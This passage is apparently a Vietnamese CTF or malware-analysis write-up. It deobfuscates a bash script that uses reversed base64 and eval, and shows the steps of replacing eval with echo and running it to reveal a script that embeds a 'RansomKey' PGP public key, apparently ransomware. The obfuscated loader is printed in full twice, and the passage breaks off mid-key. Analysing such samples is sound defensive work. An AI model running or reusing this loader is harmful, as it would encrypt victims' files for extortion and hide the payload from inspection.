yRMJFUkeFpwIikKZXZhbCAiJE4wcSR4JEhjMiRyUVciCg== ``` Đem lên cyberchef decode base64 thì mình nhận về 1 file bash shell ``` gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" '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rFWesZlWLh3aNZUOH1ERS52QJhWVahlUWlVMadUZ0RWRX9kUwU1V1U1TXpVRhtEcupFdCFjUVVzVTtkRUVWekZUZDRWMZBHZxQFUCNTUGpkRiJHZFFGM0NVZtplRkNVODdlbWdVUVB3dTFzdHJWWsdVT0oURiNlVGZlNatGVrpUVUBzYsFmMjhkTTxGMhZjQE1UY0dlYzh3RhRTWUZlM4V0UYVzaZVFcrlFWkpnUIhnMiJHbtlVNjZUZoZUbUt0aGJ1MOhkV5dWMSBnRUdlcVh0VZlzUkNHctRWN4IDVvp0VTllWupVNnpHTXJlbTlkTrVFbGJjYZp0aURTTsNFN0JzSOxmRNlXVsJGeOZlUyUkbjBDasNUMsdkWyFkaTdnVtp1dB5WTYp1RahnUtlFbOVkU1xWbTdVOVZlSORlYrJVRlpkU65EWOhlTzIEWaZXMHJmcnd0TCh2aWpXQuFVVxs2YRZVRNRkVVJlRwdGVwQmRUVnWEFGeVRlWrZEVlhmVyklRkNDZ1kkbTNjVyoldoREZRxGMhRTVwolSopXU2hGWidlRzEWMOVkV0okMhplWVVlRk5WWoZEMWlkUysESstWYLNGRlVEasRmWCNDZhRmaOFTS6pld0IzY2YlRlhXU6xERCpWWxolVhNlQzEWaCpHZTlzQSNlTwMlQGBjWZxWVVJkVXNlUGVkUKRWbSZEbwQGRsBTYu50aDdFbxolQoBjWS5URUZFZYFVasBDZydGbjVzaxElVk1mVwpkRjJnSH10MKFDTxZVVRpEbrpVcGxGV0Jkek5kWqd1VGZVVKRWMaVkRwMlRkhlUGJleZJEcnNlMRtWWvVzaNlmTY5UNG1WYHRWVZJkRq1UawhlTYxmVlRjUVNVMZxWTUJFWPlXTXR2RxclVrZEbZJkRVJlUWVVU0AzVOFHZU5ESOdlYzU1aZJFbYV1SzVUTYlzahdnSVNmasxWV2RXbRhHOTNmQ1cVW6t2MMVlV6tUYkh0Vrp1VXFFdHRmevZVV4N3VNJTWHVmR5U1YyRmaUJEZERFeNFDVDpkaWBDaqN2Qat2Q4tmVkZXNrFlRoNDVMpkMUtmTuNlQKVVT0MmeTtmRsJlWS1mYNpEWXhXRsFmVxU1VaxWVT5WOD5ESCpnYGpVVSBVNF5ETsV0TUJFVTRzZE9ENVd0Tx82dNBzYU5kcJ5GZ5d3VihXVz0EdCRFZvJFSjZEaXRGcahkV2gmRi1mRwE2dZ1WUwJEWOpmSrNmM4UkT2p1VZ9EZIdVWONDZzIEWS9mRWNGMnRlVth3aNt0bI1EW0l3UrhWRkZXSuRWU41mVHljMMhmWGR1b01WU6h2ROVFZHNVbwJTVL5UbOZVODNmeWVUVHpFWZVjTVFlUsNjWPxGVjBDazYVMNVVZUx2MVlGbsNEeS1WVWhHMWlFeVJmQOhVYtx2VNdXUwQmd0ADTTZ0MjNHZV1EaGJjWzYFRONTT6RmWSh1VUZURa9kSqVlcFhVUpJEWaREbIVmesBTTuZkeZdFbFJGawFlTJh3aXVDbXNlVOxGVwUVVjpXSW10cONDZSx2aUVkT6ZldBRUYyg2VTJTREJFNvZ0YHZlVPtGdH1Uc1IDTVp1aSRDbYdVY0tmWZRGWZVkRw4EMjR1YLl1MOllTFNWNwdkWNlTeNlnTU50VwVUT0kjMLhkTWd1MnpWT6RWMWBlWrZVMFNTU2lEbiJDdH9Uc0lWYEhWRhRTRG5EdGVkTuxmVlBDa6tkMOR1UpZ1aDNDcyE1RkBjY5NHMN1EetJVWaBTVsZURPdXV6p1MsNjUIZEbR5kWwMWRshVY1JkbW5kRuFWYOpmV2YVVSpEbEJFWSVVUFpEMjZXRUlVUktWUPRWVVRHcnNEdwMFT0BTeTRUOFR1QCN1VGRXRJREbFR1QWZUVnFUMSFlQpRlSkVlUDFzUMRHMTxkI9oGZPl3MLdzb0UmV5pGb0lgC7BSKo0UW6RnYzR1Q2YkTYF0M3gHSNZUdKg2chJ2LulmYvEyI ' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp="" x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp") eval "$N0q$x$Hc2$rQW" ``` => Nhận thấy file bash shell này đã bị xáo trộn và vấn đề là nó nằm ở dòng `eval "$N0q$x$Hc2$rQW"` , lệnh eval này nối tất cả các biến lại với nhau và thực thi. Nên mình sẽ đổi eval -> echo và thực thi nó với lệnh bash. ``` gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" '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rFWesZlWLh3aNZUOH1ERS52QJhWVahlUWlVMadUZ0RWRX9kUwU1V1U1TXpVRhtEcupFdCFjUVVzVTtkRUVWekZUZDRWMZBHZxQFUCNTUGpkRiJHZFFGM0NVZtplRkNVODdlbWdVUVB3dTFzdHJWWsdVT0oURiNlVGZlNatGVrpUVUBzYsFmMjhkTTxGMhZjQE1UY0dlYzh3RhRTWUZlM4V0UYVzaZVFcrlFWkpnUIhnMiJHbtlVNjZUZoZUbUt0aGJ1MOhkV5dWMSBnRUdlcVh0VZlzUkNHctRWN4IDVvp0VTllWupVNnpHTXJlbTlkTrVFbGJjYZp0aURTTsNFN0JzSOxmRNlXVsJGeOZlUyUkbjBDasNUMsdkWyFkaTdnVtp1dB5WTYp1RahnUtlFbOVkU1xWbTdVOVZlSORlYrJVRlpkU65EWOhlTzIEWaZXMHJmcnd0TCh2aWpXQuFVVxs2YRZVRNRkVVJlRwdGVwQmRUVnWEFGeVRlWrZEVlhmVyklRkNDZ1kkbTNjVyoldoREZRxGMhRTVwolSopXU2hGWidlRzEWMOVkV0okMhplWVVlRk5WWoZEMWlkUysESstWYLNGRlVEasRmWCNDZhRmaOFTS6pld0IzY2YlRlhXU6xERCpWWxolVhNlQzEWaCpHZTlzQSNlTwMlQGBjWZxWVVJkVXNlUGVkUKRWbSZEbwQGRsBTYu50aDdFbxolQoBjWS5URUZFZYFVasBDZydGbjVzaxElVk1mVwpkRjJnSH10MKFDTxZVVRpEbrpVcGxGV0Jkek5kWqd1VGZVVKRWMaVkRwMlRkhlUGJleZJEcnNlMRtWWvVzaNlmTY5UNG1WYHRWVZJkRq1UawhlTYxmVlRjUVNVMZxWTUJFWPlXTXR2RxclVrZEbZJkRVJlUWVVU0AzVOFHZU5ESOdlYzU1aZJFbYV1SzVUTYlzahdnSVNmasxWV2RXbRhHOTNmQ1cVW6t2MMVlV6tUYkh0Vrp1VXFFdHRmevZVV4N3VNJTWHVmR5U1YyRmaUJEZERFeNFDVDpkaWBDaqN2Qat2Q4tmVkZXNrFlRoNDVMpkMUtmTuNlQKVVT0MmeTtmRsJlWS1mYNpEWXhXRsFmVxU1VaxWVT5WOD5ESCpnYGpVVSBVNF5ETsV0TUJFVTRzZE9ENVd0Tx82dNBzYU5kcJ5GZ5d3VihXVz0EdCRFZvJFSjZEaXRGcahkV2gmRi1mRwE2dZ1WUwJEWOpmSrNmM4UkT2p1VZ9EZIdVWONDZzIEWS9mRWNGMnRlVth3aNt0bI1EW0l3UrhWRkZXSuRWU41mVHljMMhmWGR1b01WU6h2ROVFZHNVbwJTVL5UbOZVODNmeWVUVHpFWZVjTVFlUsNjWPxGVjBDazYVMNVVZUx2MVlGbsNEeS1WVWhHMWlFeVJmQOhVYtx2VNdXUwQmd0ADTTZ0MjNHZV1EaGJjWzYFRONTT6RmWSh1VUZURa9kSqVlcFhVUpJEWaREbIVmesBTTuZkeZdFbFJGawFlTJh3aXVDbXNlVOxGVwUVVjpXSW10cONDZSx2aUVkT6ZldBRUYyg2VTJTREJFNvZ0YHZlVPtGdH1Uc1IDTVp1aSRDbYdVY0tmWZRGWZVkRw4EMjR1YLl1MOllTFNWNwdkWNlTeNlnTU50VwVUT0kjMLhkTWd1MnpWT6RWMWBlWrZVMFNTU2lEbiJDdH9Uc0lWYEhWRhRTRG5EdGVkTuxmVlBDa6tkMOR1UpZ1aDNDcyE1RkBjY5NHMN1EetJVWaBTVsZURPdXV6p1MsNjUIZEbR5kWwMWRshVY1JkbW5kRuFWYOpmV2YVVSpEbEJFWSVVUFpEMjZXRUlVUktWUPRWVVRHcnNEdwMFT0BTeTRUOFR1QCN1VGRXRJREbFR1QWZUVnFUMSFlQpRlSkVlUDFzUMRHMTxkI9oGZPl3MLdzb0UmV5pGb0lgC7BSKo0UW6RnYzR1Q2YkTYF0M3gHSNZUdKg2chJ2LulmYvEyI ' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp="" x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp") echo "$N0q$x$Hc2$rQW" ``` Thực thi nó với lệnh bash : `$bash file_sh` ![](https://i.imgur.com/kdKTfja.png) ``` #!/bin/bash uFMHx73AXNF6CTsbtzYM() { tljyVe4o7K3yOdj="LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCgptUUdOQkdQYTEvc0JEQURXRDlJRUV6VjNaanFNVnBuaXlEc0ZNQlFHR3l3ZzUwOEFlU0ZYRmxMM0syb0dGQ2p3CkViSTN2Kzh0eVlnNEFtNFE4aEhDaitqOGt2blIvQ3E1VkZPV1dzMjg3WVNHK294MEpWNTNyMy9MZGp5cENYN3YKcTc0N0FEYXdYZktaWXl4RkZUL25qMGtkOVVGcFo4RDE2SWh2aDAvVzNETklRd3NsMVIzcUU0TlNVSWl5WkxINQphbElWYzFnM0lzeHlDZXBiQXErUjJOZEFTWXRZdzM3NDV3Z2FhMUdsc3FSL04vd0QwMWlmaXNBbUxYV0xVUmRxClliU3lTeUM1V3h0cTlOZ3lRQUN5YXZGUEVzcC9VNmNKU2pmSGdUNGhzQmtoTFZhL29GVmxQdnIvdEhkSytXMHoKMkxmVTg0cVFoRXB3d3NYWHdOYWZvNE82ckJjNXBpQmYwa0FmbFh6VHZpdWhFcHRodTBtM3UxbWwydnIrNTc0Mwo1OGU4ODg4STRTOElLNE5PRUZFbzBHNC9nSUlZWU1ValExWXJMbmRZRlFkSzc4MUJBSnNkT2JLT3hFQk5vdVkxCkZCcjh0VjJCT1MxTDdBTjdrcU9FeGY2MWsxUVozdGtQWWZkWHdaKzVUL3kzYW5BcS8xQmtvUlljcUJwak9XMEsKUXlRYkU3bWNHNTdqNW04QUVRRUFBYlFkVW1GdWMyOXRTMlY1SUR4eVlXNXpiMjFBYUdGamF5NXNiMk5oYkQ2SgpBYzRFRXdFS0FEZ1dJUVFWWjZNdzBtTlFqZklJQUVqL1J3MGJrcFJpVmdVQ1k5clgrd0liQXdVTENRZ0hBZ1lWCkNna0lDd0lFRmdJREFRSWVBUUlYZ0FBS0NSRC9SdzBia3BSaVZ1YjBDLzQxeFV6c24vZzI1Njdad3BZdlhEeDcKaklHK2RIV0FhYndFUUZZa2J4VEN1a3FWbXhvQzhJZ0U4a0lQdDhvZ2V3SnI5d3dFY2VheTFkZTUxaDZuTFd0TgpFRUVDMEVQck1UQnAzVkhBOGgrbG1vZXB3NXNXNzRJeERkbTNJVU9WSmluRENlYmRxZGZXMnAwZmVwSjArZGl1Clh0cnE2RVNxbl